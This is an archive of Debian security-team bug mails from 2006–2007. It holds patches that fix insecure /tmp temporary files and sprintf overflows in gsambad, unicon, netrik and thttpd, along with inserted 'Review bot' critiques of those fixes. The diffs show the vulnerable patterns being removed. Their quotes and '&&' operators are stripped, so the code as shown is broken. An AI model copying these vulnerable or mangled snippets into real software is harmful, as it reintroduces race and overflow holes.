@@ -276,7 +276,6 @@
 	| pdp10 | pdp11 | pj | pjl \
 	| powerpc | powerpc64 | powerpc64le | powerpcle | ppcbe \
 	| pyramid \
-	| score \
 	| sh | sh[1234] | sh[24]a | sh[23]e | sh[34]eb | sheb | shbe | shle | sh[1234]le | sh3ele \
 	| sh64 | sh64le \
 	| sparc | sparc64 | sparc64b | sparc64v | sparc86x | sparclet | sparclite \
@@ -285,7 +284,7 @@
 	| tahoe | thumb | tic4x | tic80 | tron \
 	| v850 | v850e \
 	| we32k \
-	| x86 | xc16x | xscale | xscalee[bl] | xstormy16 | xtensa \
+	| x86 | xscale | xscalee[bl] | xstormy16 | xtensa \
 	| z8k)
 		basic_machine=$basic_machine-unknown
 		;;
@@ -368,7 +367,7 @@
 	| tron-* \
 	| v850-* | v850e-* | vax-* \
 	| we32k-* \
-	| x86-* | x86_64-* | xc16x-* | xps100-* | xscale-* | xscalee[bl]-* \
+	| x86-* | x86_64-* | xps100-* | xscale-* | xscalee[bl]-* \
 	| xstormy16-* | xtensa-* \
 	| ymp-* \
 	| z8k-*)
@@ -910,10 +909,6 @@
 	sb1el)
 		basic_machine=mipsisa64sb1el-unknown
 		;;
-	sde)
-		basic_machine=mipsisa32-sde
-		os=-elf
-		;;
 	sei)
 		basic_machine=mips-sei
 		os=-seiux
@@ -1371,9 +1366,6 @@
 # system, and we'll never get to this point.
 
 case $basic_machine in
-score-*)
-		os=-elf
-		;;
 spu-*)
 		os=-elf
 		;;
diff -u gsambad-0.1.4/debian/changelog gsambad-0.1.4/debian/changelog
--- gsambad-0.1.4/debian/changelog
+++ gsambad-0.1.4/debian/changelog
@@ -1,4 +1,12 @@
-gsambad (0.1.4-2) unstable; urgency=medium
+gsambad (0.1.4-2etch1) stable-security; urgency=high
+
+  * Non-maintainer upload by The Security Team.
+  * Avoid unsafe usage of temporary files.
+[CVE-2007-2838]
+
+ -- Steve Kemp [EMAIL PROTECTED]  Thu, 28 Jun 2007 16:47:39 +
+
+gsambad (0.1.4-2) unstable; urgency=medium	
 
   * Adjusting the icondir.
   * Makeing use of su-to-root in the desktop file.
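Review bot: the `gsambad (0.1.4-2) unstable; urgency=medium` header is removed and re-added with only a trailing tab as the difference; strip that whitespace so the previous entry stays untouched in the diff. The new entry would also be easier to audit if it named what changed, for example "Use a unique temporary file name instead of /tmp/gsambadtmp in src/populate_conns.c".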
only in patch2:
unchanged:
--- gsambad-0.1.4.orig/src/populate_conns.c
+++ gsambad-0.1.4/src/populate_conns.c
@@ -48,7 +48,8 @@
 long file_size=0, old_pos=0;
 gchar *combined=NULL;
 gchar *utf8=NULL;
-
+char command_buffer[1024];
+char * filename;
 gtk_list_store_clear(widgets-conns_store);
 
 /* This attempt to show useful output is probably quite
@@ -64,20 +65,37 @@
 fflush(stdin);
 fflush(stdout);
 
-/* Write the output of smbstatus to a tempfile, FIXME: Static paths and generally notgoodtoday */
-if((fp=popen(touch /tmp/gsambadtmp  chmod 600 /tmp/gsambadtmp  smbstatus 21 /tmp/gsambadtmp, w))==NULL)
+/* make a secure temporary file */
+filename = tempnam( /tmp, p_c.c );
+
+/* Write the output of smbstatus to a tempfile. */
+snprintf( command_buffer, sizeof(command_buffer) - 1,
+	  touch %s  chmod 600 %s  smbstatus 21 %s,
+	  filename, filename, filename );
+
+if((fp=popen(command_buffer, w))==NULL)
 {
+/*  free memory */
+free( filename );
+
 	/* Dont show a popup */
 return;
 }
 pclose(fp);
 
 /* We want it in a tempfile so we can scroll around in it properly */
-if((fp=fopen(/tmp/gsambadtmp, r))==NULL) // FIXME: Static paths
+if((fp=fopen(filename, r))==NULL) // FIXME: Static paths
 {
+/*  free memory */
+free( filename );
+
 	/* Dont show a popup */
 return;
 }
+
+/*  free memory */
+free( filename );
+
 fseek(fp, 0, SEEK_END);
 file_size = ftell(fp);
 rewind(fp);
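Review bot: tempnam() at `filename = tempnam( /tmp, p_c.c );` only chooses a name; the file is still created afterwards by the shell's `touch %s`, so the window between picking the name and creating the file remains, and a symlink planted at that name is still followed, merely at a less predictable path. Its return value is also passed to snprintf unchecked (tempnam returns NULL on failure), and nothing in this hunk unlinks the file, so every refresh leaves one behind in /tmp. Prefer mkstemp(3), which creates the file atomically with O_EXCL and mode 0600, and pass the descriptor to the child (dup2 before exec) instead of splicing the path into a shell command; that removes the touch/chmod prelude entirely.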


Bug#431331: CVE-2007-2838: Allow arbitrary files to be created/truncated

2007-07-01 Thread Steve Kemp
On Sun Jul 01, 2007 at 21:47:42 +0200, Daniel Baumann wrote:

 uploaded 0.1.6-2 with your patch and urgency=high, so you probably want
 to mention this version for testing/sid in the DSA.

  Great.

 no offence intended, but i'd be happy if you can next time attach the
 patch to the bug report right from the beginning.

  None taken.  That was a genuine mistake, I honestly thought I'd 
 copied you into my initial report with the problem.  I usually do
 that so that maintainers aren't caught on the hop.

  I'll be much more careful to make sure I do that next time.

Steve
-- 





Bug#431336: Patch

2007-07-01 Thread Steve Kemp

  Patch we used for the DSA.

diff -u unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c 
unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c
--- unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c
+++ unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c
@@ -159,9 +159,9 @@
 IMM_Flush ()
 {
   char name[256];
-  sprintf(name,%s/.pyinput/usrphrase.tab,getenv(HOME));
+  snprintf(name,sizeof(name)-1,%s/.pyinput/usrphrase.tab,getenv(HOME));
   SaveUsrPhrase(name);
-  sprintf(name,%s/.pyinput/sysfrequency.tab,getenv(HOME));
+  snprintf(name,sizeof(name)-1,%s/.pyinput/sysfrequency.tab,getenv(HOME));
   SavePhraseFrequency(name);
 
   return 1;
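Review bot: `snprintf(name,sizeof(name)-1, ...)` still passes getenv(HOME) unchecked: a setuid program can be started without HOME in its environment, and a NULL argument for %s is undefined behaviour (glibc happens to print "(null)", yielding a relative path under the current directory). Check for NULL before formatting. The snprintf return value should also be compared against sizeof(name), since on truncation the save goes to a different, still valid path; and the `-1` is unnecessary, the size argument already accounts for the terminator.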
diff -u unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c 
unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c
--- unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c
+++ unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c
@@ -138,21 +138,21 @@
   //Rat: modified for processing user-defined dictionaries
   if ((usrhome = getenv (HOME)) != NULL)
{
-  sprintf (buf, %s/%s, usrhome, .pyinput);
+  snprintf (buf,sizeof(buf)-1, %s/%s, usrhome, .pyinput);
   retval = stat (buf, statbuf);
 
   if ((retval == 0))
{
  if ((statbuf.st_mode  S_IFMT) == S_IFDIR)
{
- sprintf (buf, %s/%s/%s, usrhome, .pyinput, usrphrase.tab);
+ snprintf (buf, sizeof(buf)-1, %s/%s/%s, usrhome, .pyinput, 
usrphrase.tab);
 
  if ( (retval = stat(buf, statbuf)) == 0)
{
  if ( statbuf.st_size  MIN_USRPHR_SIZE || LoadUsrPhrase (buf) 
== -1)
{
  printf (Couldn't load %s. Please fix it. size or load 
error\n, buf);
- sprintf (buf, %s/%s, szPath, 
usrphrase.tab);
+ snprintf (buf, sizeof(buf)-1, %s/%s, 
szPath, usrphrase.tab);
  if ((retval = access (buf, R_OK)) == 0)
{
  if (LoadUsrPhrase (buf) == -1)
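Review bot: `sizeof(buf)-1` is only a correct bound if `buf` is a fixed-size array declared in this function; its declaration is outside the hunk, so confirm it is not a `char *` (sizeof would then be the pointer size and the bound meaningless). As in CCE_pinyin.c, none of the snprintf calls in this file check the return value for truncation, and `usrhome` comes straight from getenv(HOME), so an overlong value now silently produces a different path rather than an overflow.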
@@ -164,7 +164,7 @@
  else
{
  creat (buf, 0600);
- sprintf (buf, %s/%s, szPath, usrphrase.tab);
+ snprintf (buf, sizeof(buf)-1, %s/%s, szPath, 
usrphrase.tab);
  if ((retval = access (buf, R_OK)) == 0)
{
  if (LoadUsrPhrase (buf) == -1)
@@ -181,10 +181,10 @@
   else
{
  mkdir (buf, 0700);//Rat: making $HOME/.pyinput
- sprintf (buf, %s/%s/%s, usrhome, .pyinput, usrphrase.tab);
+ snprintf (buf, sizeof(buf)-1, %s/%s/%s, usrhome, .pyinput, 
usrphrase.tab);
  creat (buf, 0600);//Rat: making $HOME/.pyinput/usrphrase.tab
 
- sprintf (buf, %s/%s, szPath, usrphrase.tab);
+ snprintf (buf, sizeof(buf)-1, %s/%s, szPath, usrphrase.tab);
  if ((retval = access (buf, R_OK)) == 0)
{
  if (LoadUsrPhrase (buf) == -1)
@@ -197,7 +197,7 @@
   else
 {
   printf (Sorry, I couldn't find your $HOME.\n);
-  sprintf (buf, %s/%s, szPath, usrphrase.tab);
+  snprintf (buf, sizeof(buf)-1, %s/%s, szPath, usrphrase.tab);
   printf (Turn to access %s, buf);
 
   if ((retval = access (buf, R_OK)) != 0)
@@ -210,7 +210,7 @@
 
 }
 
-  sprintf(buf,%s/%s/%s,usrhome,.pyinput,sysfrequency.tab);
+  snprintf(buf,sizeof(buf)-1,%s/%s/%s,usrhome,.pyinput,sysfrequency.tab);
   if(LoadPhraseFrequency(buf) == -1)
   {
  creat(buf,0700);
@@ -229,7 +229,7 @@
   AdjustPhraseFreq (); // lower the freq to [0,50)
   if (usrhome != NULL)
 {
-  sprintf (szFileName, %s/%s/%s, usrhome, .pyinput, usrphrase.tab);
+  snprintf (szFileName, sizeof(szFileName)-1, %s/%s/%s, usrhome, 
.pyinput, usrphrase.tab);
   SaveUsrPhrase (szFileName);
 }
   else
diff -u unicon-3.0.4/debian/changelog unicon-3.0.4/debian/changelog
--- unicon-3.0.4/debian/changelog
+++ unicon-3.0.4/debian/changelog
@@ -1,3 +1,11 @@
+unicon (3.0.4-11etch1) stable-security; urgency=high
+
+  * Non-maintainer upload by The Security Team.
+  * Fix the unsafe use of environmental variables.
+[CVE-2007-2835]
+
+ -- Steve Kemp [EMAIL PROTECTED]  Sun,  24 Jul 2007 15:02:42 +
+
 unicon (3.0.4-11) unstable; urgency=low
 
   * Changed TLS_PthSocket ::read ::write to Read, Write.
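Review bot: the entry "Fix the unsafe use of environmental variables" under-describes the change; what is fixed is a stack buffer overflow in fixed-size path buffers filled from $HOME with sprintf(), reachable through the setuid zhcon binary, so say that and name CCE_pinyin.c and xl_pinyin.c so the changelog matches the DSA text. The timestamp `Sun,  24 Jul 2007` is also inconsistent: 24 Jul 2007 was a Tuesday, and this mail is dated 1 Jul 2007.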


Steve
-- 
http://www.steve.org.uk/





Bug#431332: CVE-2007-2837: Arbitrary file removal

2007-07-01 Thread Steve Kemp
On Sun Jul 01, 2007 at 21:56:43 +0200, Martin MAURER wrote:

 I agree that this code could become a problem, although I wasn't able to
 reproduce using screen and the command written in your mail.

  I could reproduce this using the -qt version of the client.  First of
 all adding some rules, then bringing up the rule list and removing one
 of them.

 Anyways - what really might happen is that the file is overwritten, not
 deleted, as rm should delete the link not the file the link points to.

  That is generally true.  I'm trying to remember whether it was
 unlinked and I'm 99% certain it was, rather than truncated/trashed.

 Nevertheless, this doesn't make a big difference, so I will add your fix
 to the official version of fireflier. 

  Thanks a lot.

Steve
-- 
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/






Bug#430691: [EMAIL PROTECTED]

2007-06-27 Thread Steve Kemp
On Wed Jun 27, 2007 at 11:29:12 +0900, Taku YASUI wrote:

 I'll upload new upstream version to sid soon.
 And I attach the patch to fix this problem.

  Great, thanks.

  If you could tell us which version in Sid would fix the problem
 I can include that in the advisory.

Steve
-- 





Bug#430691: hiki: [security] vulnerability that arbitrary files would be deleted

2007-06-26 Thread Steve Kemp
  Hiki 0.8.0 - 0.8.6 is affected, it means that stable, testing and unstable
  packages in Debian are affected. Please update hiki package.
 
  For more detail, see http://hikiwiki.org/en/advisory20070624.html

  Joey if you could allocate an ID I'll upload a fixed package.

Steve
-- 





Bug#430012: CVE-2006-4168: Integer overflow vulnerability fixed in 0.6.16

2007-06-21 Thread Steve Kemp
On Thu Jun 21, 2007 at 20:16:41 +0200, Stefan Fritsch wrote:

 CVE-2006-4168:
 Integer overflow in the exif_data_load_data_entry function in
 libexif/exif-data.c in Libexif before 0.6.16 allows remote attackers to
 cause a denial of service (application crash) or execute arbitrary code
 via an image with many EXIF components, which triggers a heap-based
 buffer overflow.
 
 This is fixed in 0.6.16, see
 http://sourceforge.net/project/shownotes.php?release_id=515385

  This was already fixed, for Sarge + Etch:


http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00070.html

http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00071.html

Steve
--





Bug#424690: CVE-2007-1673: denial of service (infinite loop) in zoo and unzoo

2007-06-18 Thread Steve Kemp

  I see no copy of the vulnerable code in the Debian version of unzoo,
 I suspect this is only an issue for the non-free version of unzoo,
 which we'll not release an update for.

  Comments?

Steve
-- 
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/






Bug#429218: [CVE-2007-3125] format string issue in X.509 certificate processing

2007-06-18 Thread Steve Kemp
  Fixed already in Stable (etch):

  w3m (0.5.1-5.1) unstable; urgency=high

* NMU by the Security Team:
* Fix format string vulnerability in display of SSL certificates.
 (No CVE ID yet) (Closes: #404564)

   -- Moritz Muehlenhoff [EMAIL PROTECTED]  Tue, 26 Dec 2006 18:49:26 +0100

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/






Bug#429191: flyspray phpmailer: not relevant for stable

2007-06-17 Thread Steve Kemp
On Sun Jun 17, 2007 at 18:20:01 +0200, Thijs Kinkhorst wrote:

 For stable I've checked whether it's 
 vulnerable and I believe it's not: the vulnerability is in the SendmailSend() 
 function. That requires for the calling code to actually use the sendmail 
 method, which Flyspray does not allow in any configuration.
 
 I suppose the security team does not send advisories for insecure code that 
 is not called?

  Agreed.

 As an additional note: sarge is not vulnerable because it doesn't contain a 
 copy of the phpmailer class at all.

  :)

  So we don't need to do anything, perfect!

Steve
-- 






Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype

2007-05-30 Thread Steve Kemp
On Wed May 30, 2007 at 06:19:29 -0700, Steve Langasek wrote:

 Signed package for etch is on its way up to
 http://people.debian.org/~vorlon/freetype/ right now (built with -sa, so
 should indeed be ready for upload straight to security-master).

  Thanks a lot, Steve.

 Let me know if there's anything else you need from me for etch.  

  Looks good, thanks.  I'll upload tomorrow with an aim of getting
 it released on Friday.

 I haven't
 yet looked into whether this bug affects the sarge version of the package,
 I'll do that next (unless somebody here already knows the answer).

  I was under the impression that it wasn't vulnerable, but I admit
 I've not yet checked.  If we've not heard back by the time I make 
 the upload I'll take a look myself.

Steve
-- 
http://www.steve.org.uk/





Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype

2007-05-29 Thread Steve Kemp
On Sun May 27, 2007 at 12:47:58 +0200, Moritz Muehlenhoff wrote:

 I guess we should fix this, it's indirectly remotely exploitable at least
 by providing someone a malformed TTF font file. As libfreetype is an important
 infrastructure library there might also be unforeseen indirect attack
 vectors, like embedding TTFs in other document types, etc.

  Agreed.

 Steve Kemp wanted to work on a DSA, so you should probably check back
 with him before preparing an upload.

  I was planning on handling this yes, so if there were a fixed package
 available for Etch then I'd appreciate seeing it.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/






Bug#404233: CVE-2006-6678: Netrik arbitrary command execution

2006-12-22 Thread Steve Kemp
On Fri, Dec 22, 2006 at 06:42:41PM +0100, Stefan Fritsch wrote:

 A vulnerability has been reported in Netrik:

  Thanks for the report.  Security update for Sarge is building now.

  Patch attached:

Steve
-- 

--- form-file.c 2003-08-06 10:28:45.0 +
+++ /home/skx/form-file.c   2006-12-22 22:19:12.0 +
@@ -10,6 +10,7 @@
  * (C) 2003 antrik
  */

+#include ctype.h
 #include sys/stat.h
 #include fcntl.h
 #include stdio.h
@@ -107,6 +108,14 @@
   char temp_name[size];
   snprintf(temp_name, size, format, name);

+  /* make sure we get a proper filename */
+  {
+char   *chr;
+for(chr=temp_name; *chr; ++chr)
+   if(!isalnum(*chr))/* not safe filename char - replace */
+  *chr='_';
+  }
+
   /* write temporary file */
   {
 intfildes;
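Review bot: `isalnum(*chr)` is called with a plain `char`; for bytes above 0x7f (a non-ASCII form field name) the value is negative where char is signed, and passing a negative value other than EOF to a ctype function is undefined behaviour. Use `if(!isalnum((unsigned char)*chr))`. Note also that the mapping collapses distinct names (`a.b` and `a-b` both become `a_b`), so two fields can end up with the same temp_name; that is fine only if the name is used as a template for a uniquely created file (mkstemp) in the "write temporary file" block below rather than opened directly, which this hunk does not show.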






Bug#398936: libapache2-mod-ifier: The module breaks POST processing

2006-11-16 Thread Steve Kemp
Package: libapache2-mod-ifier
Version: 0.8-2
Severity: grave
Justification: renders package unusable


  This module, when installed and enabled, breaks all processing of
 POST requests.

  It should be removed from Etch until it can be updated to work
 correctly.

-- System Information:
Debian Release: 4.0
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-1-486
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)

Versions of packages libapache2-mod-ifier depends on:
ii  apache2.2-common 2.2.3-3.1   Next generation, scalable, extenda
ii  libc62.3.6.ds1-8 GNU C Library: Shared libraries

libapache2-mod-ifier recommends no packages.

-- no debconf information





Bug#396277: allows creating any file as root

2006-10-31 Thread Steve Kemp
On Mon, Oct 30, 2006 at 10:56:28PM +0100, Marco d'Itri wrote:

 By creating a /tmp/start_thttpd symlink a local attacker will be able to
 create/touch any file as root.

  Thanks for the report.  Once I get a CVE identifier allocated I'll
 handle an update for Sarge.

  Daniel if you have a preferred patch that would be appreciated,
 otherwise I'll come up with a solution and add it to this bug.

Steve
-- 





Bug#396277: allows creating any file as root

2006-10-31 Thread Steve Kemp

Daniel

  Please find attached the patch I'm going to use for the security
 update.

  Could you please apply it, or a comparable patch to the version
 in unstable and let us know which version will fix the problem?

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit

[EMAIL PROTECTED]:/tmp$ interdiff thttpd_2.23beta1-3sarge1.diff  
thttpd_2.23beta1-3sarge2.diff
diff -u thttpd-2.23beta1/debian/changelog thttpd-2.23beta1/debian/changelog
--- thttpd-2.23beta1/debian/changelog
+++ thttpd-2.23beta1/debian/changelog
@@ -1,3 +1,11 @@
+thttpd (2.23beta1-3sarge2) stable-security; urgency=high
+
+  * Non-maintainer upload by the Security Team.
+  * Fix the insecure use of temporary files when invoked by logrotate.
+[CVE-2006-4248]
+
+ -- Steve Kemp [EMAIL PROTECTED]  Tue, 31 Oct 2006 17:49:34 +
+
 thttpd (2.23beta1-3sarge1) stable-security; urgency=high

   * Non-maintainer upload by the Security Team
diff -u thttpd-2.23beta1/debian/thttpd.logrotate 
thttpd-2.23beta1/debian/thttpd.logrotate
--- thttpd-2.23beta1/debian/thttpd.logrotate
+++ thttpd-2.23beta1/debian/thttpd.logrotate
@@ -4,15 +4,9 @@
 compress
 missingok
 delaycompress
-prerotate
-   if pidof thttpd 21  /dev/null; then
-   touch /tmp/start_thttpd
-   fi
-endscript
 postrotate
-   if [ -f /tmp/start_thttpd ]; then
+if [ -f /var/run/thttpd.pid ]; then
/etc/init.d/thttpd restart 21  /dev/null
-   rm -f /tmp/start_thttpd
fi
 endscript
 }
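Review bot: the replacement test `[ -f /var/run/thttpd.pid ]` checks for a file, not for a running process; a stale pid file left behind by a crash makes postrotate restart (in effect start) a daemon the administrator had not been running, whereas the removed prerotate used pidof to test for the live process. Consider `pidof thttpd` again, or `kill -0 "$(cat /var/run/thttpd.pid)"`, inside the postrotate script. Dropping the flag file is otherwise the right fix: prerotate and postrotate no longer share state through a world-writable directory, and /var/run is only writable by root.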





Bug#394637: gaim-encryption plugin does not load

2006-10-22 Thread Steve Kemp
On Sun, Oct 22, 2006 at 01:08:18PM +0200, Jan Strnad wrote:

 Package: gaim-encryption
 Version: 3.0~beta5-3
 Severity: critical
 Tags: security
 Justification: root security hole

  This doesn't appear to have any security implications.  Certainly
 not a root hole.

  Sure you could argue that not having encryption is a security
 issue; but installing this package will not cause your machine to
 become vulnerable in any realistic fashion.

  Please re-classify accordingly.

Steve
-- 




Bug#381376: Status of CVE-2006-3918 #381376

2006-09-10 Thread Steve Kemp
On Sat, Sep 09, 2006 at 01:22:25PM +0200, Stefan Fritsch wrote:
 On Saturday 09 September 2006 12:35, Loïc Minier wrote:
   I think only apache was uploaded for CVE-2006-3918, and not
  apache2. Do you intend to issue a DSA for apache2 as well?  Or
  isn't it affected by the vulnerability?
 
   This is fixed in apache2 = 2.0.55-4.1 in unstable.
 
 The issue is less severe for apache2 because it is much more difficult 
 to exploit: apache2 will first wait for the request timeout (usually 
 5 minutes) before sending the problematic error message.

  I have a pending upload of Apache2 for this, but I've been
 unexpectedly busy.  I did intend it to be a day or two after
 the apache update.

  All being well I'll get it released tomorrow.  If not it will
 have to be midweek.

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#380182: Confirmed

2006-07-28 Thread Steve Kemp
  A security advisory is pending.

  This bug applies to both the apache and apache2 packages.  Same 
 fix in both packages, but in different locations...

Steve
-- 






Bug#380231: [CVE-2006-3747] Off-by-one flaw exists in the Rewrite module, mod_rewrite

2006-07-28 Thread Steve Kemp
On Fri, Jul 28, 2006 at 05:06:38PM +0200, Daniel Leidert wrote:

 The latest release notes [1] of apache 1.3.37, 2.0.59 and 2.2.3 contains a
 note, about an off-by-one flaw (CVE-2006-3747 [2]).
 
 [1] http://www.apache.org/dist/httpd/Announcement2.2.html
 [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3747
 
 Please check, if the Debian package(s) is/are vulnerable.

  apache + apache2 packages are affected.  DSA in preparation.

  Thanks for the report.

  (Please see also #380182)

Steve
-- 




Bug#379174: Shadow security update for CVE-2006-3378

2006-07-23 Thread Steve Kemp
On Sun, Jul 23, 2006 at 06:16:00PM +0200, Christian Perrier wrote:
 Hello dear Security team (and ftpmasters, and shadow package maintainers),
 
 Being back from 2 days holiday I discover CVE-2006-3378 which has just
 been revealed to our attention (#359174 in the BTS).

  I guess you mean #379174 here?

 What I propose to you, as soon as we have a fix for CVE-2006-3378:
 
 
 -urgently destroy 4.0.3-31sarge6 and 31sarge7 from the
  proposed-updates queue. Need ftpmasters collaboration with high urgency
 -the security team, or the shadow package team, prepares
  4.0.3-31sarge6 with the fix for CVE-2006-3378 *ALONE*
 -the shadow package team prepares 4.0.3-31sarge7 with BOTH updates and
  sends it to the proposed-updates queue so that it can be picked by the
  SRM team when they're ready to update sarge
 

  Sounds fine from the security point of view.  Once a patch is
 available at least.

Steve
-- 




Bug#379347: xen-tools: xen-create image fails at xt-create-image

2006-07-22 Thread Steve Kemp
On Sun, Jul 23, 2006 at 12:42:28AM +, Henning Sprang wrote:
 Package: xen-tools
 Version: 2.1-3
 Severity: grave
 Justification: renders package unusable

  Grave seems a little extreme since the package clearly works for
 some.  However I'm happy to leave it there for a day or two at
 least until I can update documentation to be better.

 when running 
  xen-create-image --size=5Gb --swap=1024Mb --dhcp --lvm=virtualmachines 
 --hostname=fasel --kernel=/boot/vmlinuz-2.6.16-xen 
 --initrd=/boot/initrd-2.6.16-xen.img --force

  It looks like you're missing an installation method.  Please add:

--dist=sarge --debootstrap

  This might be all you need. 

  It isn't clear whether you've modified the global configuration
 file /etc/xen-tools/xen-tools.conf, I will assume you haven't since 
 if you had you could have setup the various options that you've specified 
 there.

 --- start message ---
 Creating ext3 filesystem on /dev/virtualmachines/fasel-disk
 Done
 
 Installing your system with Running command '/usr/bin/xt-install-image 
 --location=/tmp/MqrYmFUWft --dist=sarge --cache=yes >/dev/null 2>/dev/null' 
 failed.
 --- end message ---

  This means it made the filesystems, etc, but failed to install with
 debootstrap/rpmstrap/copy/tar.  That could be because you didn't 
 specify one of those options, or it might be because one was specified
 in the configuration file but failed for some reason.

  I can't really tell just yet.


 Unfortunately, this message doesn't give any hint what could be done better, 
 and trying to run the given command to try to get more
 information doesn't help, because the temporary directory is removed already.

  Indeed the temporary directory has been removed, but you can create
 it and mount the previously created image from /dev/virtualmachines/fase1-disk
 if you do wish to explore.


 No idea how this package should be used.

  It seems you do have a reasonable idea, it is just unfortunate that
 this invocation didn't proceed correctly.  Running man
 xen-create-image might have been useful since it does cover the
 usage of the different installation methods, and the specification
 of the distribution you wish to install ..

  I'd suggest that you repeat the command with --dist=sarge
 --debootstrap as an initial step.  If that fails, or if you
 wish to generate more output please add --verbose and 
 send the log to this bug report.


Steve
-- 
http://www.steve.org.uk/





Bug#379347: further tests - no success

2006-07-22 Thread Steve Kemp
On Sun, Jul 23, 2006 at 01:03:33AM +0200, Henning Sprang wrote:

 I also tried the same with a loopback disk image - no success.

  OK that is good to know.

 I do exactly what is documented, and have no idea how to investigate
 the problem further.

  I've given you things to try.  The most obvious is adding
 --dist=sarge --debootstrap.

  If that fails too then add --verbose so that all the diagnostics
 are available.

 Let me know what I can try to give more help on solving this bug.

  I have.  Twice now.

 Maybe the call to the external program should not be made in a way that
 analyzing problems is impossible, and there should be a way to keep
 the tmp data.

  You can, it is stored in the LVM file you specified.  Simply mount it.

  (If you used the loopback image you could also mount that after the
 failure occurs).


Steve
-- 





Bug#379347: xen-tools: xen-create image fails at xt-create-image

2006-07-22 Thread Steve Kemp
On Sun, Jul 23, 2006 at 01:27:51AM +0200, Henning Sprang wrote:

 Actually, that helped, as said before, but it is not clear, or even
 evident, that --debootstrap/--rpmstrap must be given from the manpage,

  I think it is - from man xen-create-image:

--cut--

INSTALLATION METHODS
 The new guest images may be installed in several different ways:

 1.  With the B<debootstrap> command.
 2.  With the B<rpmstrap> command.
 3.  By copying an existing installation.
 4.  By untarring a file containing a previous installation.

 These different methods can be selected by either the command line
arguments, or settings in the configuration file.

--cut--

  (Hmm that should be --debootstrap option, and --rpmstrap option 
respectively.  Will update that.)

 and it also seems unreasonable - you can't install sarge/etch with
 rpmstrap, and you can't install centos or fedora with debootstrap. But
 maybe you are working on a secret dpkg for centos?! :)

  I guess that is true - but you might want to install sarge by untarring, or 
 copying a previously created image.  So dist=sarge cannot be assumed to
 mean debootstrap.

  That's the main reason why these are distinct, and mutually exclusive, 
 options.

 Severity still important in my opinion because the tool isn't usable
 without major tweaking around with all the options.

  I will update the code to ensure at least one option is supplied for
 the installation method, which I will regard as closing this bug.

  (ie in your example it would output a message and exit:

please choose one of the following options:
--debootstrap - Install with debootstrap
--rpmstrap- Install the dist with rpmstrap
--copy- Copy from the selected directory .. etc)

 
  However I disagree utterly with the major tweaking, because this
 option could be specified in the configuration file as the comments
 indicate.

  I have to assume that people attempting to use software will examine
 the configuration file.  Otherwise you could claim that apt-get is
 broken because the default configuration file doesn't point to a 
 local mirror without major tweaking.

  .. still I'm glad you got it working now :)

Steve
--






Bug#372531: Update of wzdftpd 0.5.2-1.1sarge1 for 3.1r3

2006-07-04 Thread Steve Kemp
On Tue, Jul 04, 2006 at 02:39:00PM +0200, Pierre Chifflier wrote:
 On Tue, Jul 04, 2006 at 02:30:10PM +0200, Julien Danjou wrote:
  Hello,
  
  The fix for DSA-1006-1 on wzdftpd broke dependencies as explained in bug
  report #372531.
  We would like to see this bug fixed in the next stable point-release.
  
  Would it be possible to the security team to fix this package or maybe to 
  the
  maintainer to upload a new and fixed version of its package?
  
  Please, keep us in touch, since we plan to point-release ASAP.
  
 
 Hi,
 
 Since the debian/control files uses only depends like:
 wzdftpd (= ${Source-Version})
 a simple rebuild should fix the problem.

  If you're not expecting a new advisory then building it yourself
 would be appreciated.

Steve
-- 





Bug#372719: regression in FreeType security fix for DSA-1095

2006-06-26 Thread Steve Kemp
On Sun, Jun 25, 2006 at 03:09:51PM -0700, Steve Langasek wrote:

 As mentioned earlier this month, a regression was found in the freetype
 2.1.7-2.5 package uploaded for DSA-1095 which caused applications to crash
 with division-by-zero errors.  I've prepared a maintainer upload to fix
 this regression using the patch from bug #373581, which can be found at
 http://people.debian.org/~vorlon/freetype-DSA/.
 
 Can I upload this to security.d.o for a revised DSA?

  Yes, please do.

Steve
-- 




Bug#375267: xen-tools: FTBFS: Test failures

2006-06-24 Thread Steve Kemp
On Sat, Jun 24, 2006 at 05:21:32PM -0400, Daniel Schepler wrote:

 From my pbuilder build log:

  Good catch, thanks for reporting it.

 ...
 tests/getopt..ok 1 - File exists: ./bin/xen-create-image
 ok 2 - File is executable
 Cannot read file '/etc/xen-tools/xen-tools.conf' - No such file or directory 
 at ./bin/xen-create-image line 736.

  OK this is a stupid error on my part.

  What is happening here is that we attempt to run the following
 command:

./bin/xen-create-image --help

  This is done specifically so that we can capture the options
 which are allegedly supported by the tool.  Then we can actually
 ensure that every option advertised is actually available/used.

  This test was added recently as a result of:

#374987:  --fs is a unknown option

  However since the software isn't installed it aborts on
 failing to read the configuration file.  Typically I'd just
 add a --test flag, but that won't work in this case since
 we expect to read the configuration file and *then* parse the
 command line arguments!

  I will update the test shortly to avoid this execution.

  In the mean time removing make test from the debian/rules file
 will allow it to build... although this is clearly not an ideal
 solution.

  The test suite should be runnable without the software being installed
 and it mostly is...


Steve
-- 





Bug#374181: leaks potentially sensitive information (e.g. passwords) to www.google.com

2006-06-17 Thread Steve Kemp
On Sat, Jun 17, 2006 at 08:01:22PM +0200, Robert Millan wrote:
 Package: firefox
 Severity: grave
 Tags: security

  Not a security bug.

 When pasting using X11 clipboard to a firefox window, unless the focus is in a
 specific place like the navigation bar or an edit box, it'll assume you want 
 to
